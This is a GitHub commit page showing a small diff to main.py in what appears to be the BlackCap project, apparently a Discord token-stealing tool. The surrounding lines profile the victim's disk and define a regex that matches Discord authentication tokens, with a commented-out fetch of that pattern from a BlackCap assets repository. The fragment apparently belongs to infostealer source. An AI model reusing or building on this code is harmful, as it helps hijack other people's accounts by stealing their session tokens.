Update main.py

This commit is contained in:
What about KSCH 2023-02-13 15:44:15 +01:00 committed by GitHub
parent 4667226e0e
commit 762d28486f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 3 deletions

View File

@ -116,11 +116,8 @@ d1sk = str(psutil.disk_usage('/')[0] / 1024 ** 3).split(".")[0]
#BlackCap_Regex = 'https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/reg.txt'
#reg_req = requests.get(BlackCap_Regex)
clear_reg = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
#\.[\w-]{25,110}
#r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"